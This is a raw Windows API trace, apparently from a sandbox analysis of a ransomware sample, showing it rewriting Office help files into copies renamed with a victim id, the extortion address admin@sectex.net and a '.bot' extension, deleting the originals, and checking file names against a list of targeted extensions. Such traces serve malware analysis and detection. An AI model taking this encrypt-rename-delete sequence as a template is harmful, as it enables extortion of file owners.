	[0153.941] WriteFile (in: hFile=0x3d0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0153.942] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.942] WriteFile (in: hFile=0x3d0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xfe, lpOverlapped=0x0) returned 1
	[0153.942] SetEndOfFile (hFile=0x3d0) returned 1
	[0153.942] CloseHandle (hObject=0x3d0) returned 1
	[0153.942] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.942] SetEndOfFile (hFile=0x268) returned 1
	[0153.944] CloseHandle (hObject=0x268) returned 1
	[0153.945] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.945] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winproj.dev_k_col.hxk")) returned 1
	[0153.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK") returned 69
	[0153.945] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK") returned 69
	[0153.945] lstrlenW (lpString=".doc") returned 4
	[0153.946] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.946] lstrlenW (lpString=".docx") returned 5
	[0153.946] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.946] lstrlenW (lpString=".pdf") returned 4
	[0153.946] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.946] lstrlenW (lpString=".xls") returned 4
	[0153.946] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.946] lstrlenW (lpString=".xlsx") returned 5
	[0153.946] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.946] lstrlenW (lpString=".ppt") returned 4
	[0153.946] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK") returned 69
	[0153.946] lstrlenW (lpString=".zip") returned 4
	[0153.946] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.946] lstrlenW (lpString=".rar") returned 4
	[0153.946] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.946] lstrlenW (lpString=".bz2") returned 4
	[0153.946] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.946] lstrlenW (lpString=".7z") returned 3
	[0153.946] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK") returned 69
	[0153.946] lstrlenW (lpString=".dbf") returned 4
	[0153.946] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK") returned 69
	[0153.946] lstrlenW (lpString=".1cd") returned 4
	[0153.946] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.946] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK") returned 69
	[0153.946] lstrlenW (lpString=".jpg") returned 4
	[0153.946] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK") returned 69
	[0153.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK") returned 69
	[0153.947] lstrlenW (lpString=".doc") returned 4
	[0153.947] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.947] lstrlenW (lpString=".docx") returned 5
	[0153.947] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.947] lstrlenW (lpString=".pdf") returned 4
	[0153.947] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.947] lstrlenW (lpString=".xls") returned 4
	[0153.947] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.947] lstrlenW (lpString=".xlsx") returned 5
	[0153.947] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.947] lstrlenW (lpString=".ppt") returned 4
	[0153.947] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK") returned 69
	[0153.947] lstrlenW (lpString=".zip") returned 4
	[0153.947] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.947] lstrlenW (lpString=".rar") returned 4
	[0153.947] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.947] lstrlenW (lpString=".bz2") returned 4
	[0153.947] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.947] lstrlenW (lpString=".7z") returned 3
	[0153.947] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK") returned 69
	[0153.947] lstrlenW (lpString=".dbf") returned 4
	[0153.947] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK") returned 69
	[0153.947] lstrlenW (lpString=".1cd") returned 4
	[0153.947] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.947] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINPROJ.DEV_K_COL.HXK") returned 69
	[0153.947] lstrlenW (lpString=".jpg") returned 4
	[0153.947] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.948] lstrcmpiW (lpString1=".HXT", lpString2=".bot") returned 1
	[0153.948] lstrlenW (lpString="WINWORD_COL.HXT") returned 15
	[0153.948] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0153.948] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=207) returned 1
	[0153.948] CloseHandle (hObject=0x268) returned 1
	[0153.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxt")) returned 0x20
	[0153.949] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxt.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0153.949] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.949] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.949] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxt.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0153.950] GetLastError () returned 0x0
	[0153.950] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0xcf, lpOverlapped=0x0) returned 1
	[0153.951] WriteFile (in: hFile=0x3d0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xd0, lpOverlapped=0x0) returned 1
	[0153.951] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.951] WriteFile (in: hFile=0x3d0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf2, lpOverlapped=0x0) returned 1
	[0153.952] SetEndOfFile (hFile=0x3d0) returned 1
	[0153.952] CloseHandle (hObject=0x3d0) returned 1
	[0153.952] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.952] SetEndOfFile (hFile=0x268) returned 1
	[0153.954] CloseHandle (hObject=0x268) returned 1
	[0153.954] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.954] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_col.hxt")) returned 1
	[0153.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT") returned 63
	[0153.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT") returned 63
	[0153.955] lstrlenW (lpString=".doc") returned 4
	[0153.955] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0153.955] lstrlenW (lpString=".docx") returned 5
	[0153.955] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0153.955] lstrlenW (lpString=".pdf") returned 4
	[0153.955] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0153.955] lstrlenW (lpString=".xls") returned 4
	[0153.955] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0153.955] lstrlenW (lpString=".xlsx") returned 5
	[0153.955] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0153.955] lstrlenW (lpString=".ppt") returned 4
	[0153.955] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0153.955] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT") returned 63
	[0153.955] lstrlenW (lpString=".zip") returned 4
	[0153.955] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0153.955] lstrlenW (lpString=".rar") returned 4
	[0153.956] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0153.956] lstrlenW (lpString=".bz2") returned 4
	[0153.956] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0153.956] lstrlenW (lpString=".7z") returned 3
	[0153.956] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0153.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT") returned 63
	[0153.956] lstrlenW (lpString=".dbf") returned 4
	[0153.956] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0153.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT") returned 63
	[0153.956] lstrlenW (lpString=".1cd") returned 4
	[0153.956] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0153.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT") returned 63
	[0153.956] lstrlenW (lpString=".jpg") returned 4
	[0153.956] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0153.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT") returned 63
	[0153.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT") returned 63
	[0153.956] lstrlenW (lpString=".doc") returned 4
	[0153.956] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1
	[0153.956] lstrlenW (lpString=".docx") returned 5
	[0153.956] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1
	[0153.956] lstrlenW (lpString=".pdf") returned 4
	[0153.956] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1
	[0153.956] lstrlenW (lpString=".xls") returned 4
	[0153.956] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1
	[0153.956] lstrlenW (lpString=".xlsx") returned 5
	[0153.956] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1
	[0153.956] lstrlenW (lpString=".ppt") returned 4
	[0153.956] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1
	[0153.956] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT") returned 63
	[0153.956] lstrlenW (lpString=".zip") returned 4
	[0153.956] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1
	[0153.957] lstrlenW (lpString=".rar") returned 4
	[0153.957] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1
	[0153.957] lstrlenW (lpString=".bz2") returned 4
	[0153.957] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1
	[0153.957] lstrlenW (lpString=".7z") returned 3
	[0153.957] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1
	[0153.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT") returned 63
	[0153.957] lstrlenW (lpString=".dbf") returned 4
	[0153.957] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1
	[0153.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT") returned 63
	[0153.957] lstrlenW (lpString=".1cd") returned 4
	[0153.957] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1
	[0153.957] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_COL.HXT") returned 63
	[0153.957] lstrlenW (lpString=".jpg") returned 4
	[0153.957] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1
	[0153.957] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0153.957] lstrlenW (lpString="WINWORD_F_COL.HXK") returned 17
	[0153.957] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_f_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0153.958] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=114) returned 1
	[0153.958] CloseHandle (hObject=0x268) returned 1
	[0153.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_f_col.hxk")) returned 0x20
	[0153.958] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_f_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_f_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0153.958] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.958] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.958] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_f_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0153.959] GetLastError () returned 0x0
	[0153.959] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x72, lpOverlapped=0x0) returned 1
	[0153.960] WriteFile (in: hFile=0x3d0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
	[0153.961] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x0, lpOverlapped=0x0) returned 1
	[0153.961] WriteFile (in: hFile=0x3d0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0xf6, lpOverlapped=0x0) returned 1
	[0153.961] SetEndOfFile (hFile=0x3d0) returned 1
	[0153.961] CloseHandle (hObject=0x3d0) returned 1
	[0153.961] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.961] SetEndOfFile (hFile=0x268) returned 1
	[0153.964] CloseHandle (hObject=0x268) returned 1
	[0153.964] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0153.964] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_f_col.hxk")) returned 1
	[0153.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK") returned 65
	[0153.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK") returned 65
	[0153.965] lstrlenW (lpString=".doc") returned 4
	[0153.965] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.965] lstrlenW (lpString=".docx") returned 5
	[0153.965] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.965] lstrlenW (lpString=".pdf") returned 4
	[0153.965] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.965] lstrlenW (lpString=".xls") returned 4
	[0153.965] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.965] lstrlenW (lpString=".xlsx") returned 5
	[0153.965] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.965] lstrlenW (lpString=".ppt") returned 4
	[0153.965] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.965] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK") returned 65
	[0153.965] lstrlenW (lpString=".zip") returned 4
	[0153.965] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.965] lstrlenW (lpString=".rar") returned 4
	[0153.965] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.966] lstrlenW (lpString=".bz2") returned 4
	[0153.966] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.966] lstrlenW (lpString=".7z") returned 3
	[0153.966] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK") returned 65
	[0153.966] lstrlenW (lpString=".dbf") returned 4
	[0153.966] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK") returned 65
	[0153.966] lstrlenW (lpString=".1cd") returned 4
	[0153.966] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK") returned 65
	[0153.966] lstrlenW (lpString=".jpg") returned 4
	[0153.966] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK") returned 65
	[0153.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK") returned 65
	[0153.966] lstrlenW (lpString=".doc") returned 4
	[0153.966] lstrcmpiW (lpString1=".doc", lpString2=".HXK") returned -1
	[0153.966] lstrlenW (lpString=".docx") returned 5
	[0153.966] lstrcmpiW (lpString1=".docx", lpString2="L.HXK") returned -1
	[0153.966] lstrlenW (lpString=".pdf") returned 4
	[0153.966] lstrcmpiW (lpString1=".pdf", lpString2=".HXK") returned 1
	[0153.966] lstrlenW (lpString=".xls") returned 4
	[0153.966] lstrcmpiW (lpString1=".xls", lpString2=".HXK") returned 1
	[0153.966] lstrlenW (lpString=".xlsx") returned 5
	[0153.966] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXK") returned -1
	[0153.966] lstrlenW (lpString=".ppt") returned 4
	[0153.966] lstrcmpiW (lpString1=".ppt", lpString2=".HXK") returned 1
	[0153.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK") returned 65
	[0153.966] lstrlenW (lpString=".zip") returned 4
	[0153.966] lstrcmpiW (lpString1=".zip", lpString2=".HXK") returned 1
	[0153.966] lstrlenW (lpString=".rar") returned 4
	[0153.967] lstrcmpiW (lpString1=".rar", lpString2=".HXK") returned 1
	[0153.967] lstrlenW (lpString=".bz2") returned 4
	[0153.967] lstrcmpiW (lpString1=".bz2", lpString2=".HXK") returned -1
	[0153.967] lstrlenW (lpString=".7z") returned 3
	[0153.967] lstrcmpiW (lpString1=".7z", lpString2="HXK") returned -1
	[0153.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK") returned 65
	[0153.967] lstrlenW (lpString=".dbf") returned 4
	[0153.967] lstrcmpiW (lpString1=".dbf", lpString2=".HXK") returned -1
	[0153.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK") returned 65
	[0153.967] lstrlenW (lpString=".1cd") returned 4
	[0153.967] lstrcmpiW (lpString1=".1cd", lpString2=".HXK") returned -1
	[0153.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_F_COL.HXK") returned 65
	[0153.967] lstrlenW (lpString=".jpg") returned 4
	[0153.967] lstrcmpiW (lpString1=".jpg", lpString2=".HXK") returned 1
	[0153.967] lstrcmpiW (lpString1=".HXK", lpString2=".bot") returned 1
	[0153.967] lstrlenW (lpString="WINWORD_K_COL.HXK") returned 17
	[0153.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_k_col.hxk"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0153.968] GetFileSizeEx (in: hFile=0x268, lpFileSize=0xabcff1c | out: lpFileSize=0xabcff1c*=113) returned 1
	[0153.968] CloseHandle (hObject=0x268) returned 1
	[0153.968] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_k_col.hxk")) returned 0x20
	[0153.968] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_k_col.hxk.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0153.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_k_col.hxk"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x268
	[0153.968] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.968] SetFilePointerEx (in: hFile=0x268, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xabcfec8 | out: lpNewFilePointer=0x0) returned 1
	[0153.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\WINWORD_K_COL.HXK.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\winword_k_col.hxk.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d0
	[0153.969] GetLastError () returned 0x0
	[0153.969] ReadFile (in: hFile=0x268, lpBuffer=0xb6b0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xabcfed4, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesRead=0xabcfed4*=0x71, lpOverlapped=0x0) returned 1
	[0154.218] WriteFile (in: hFile=0x3d0, lpBuffer=0xb6b0020*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0xabcfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb6b0020*, lpNumberOfBytesWritten=0xabcfc9c*=0x80, lpOverlapped=0x0) returned 1
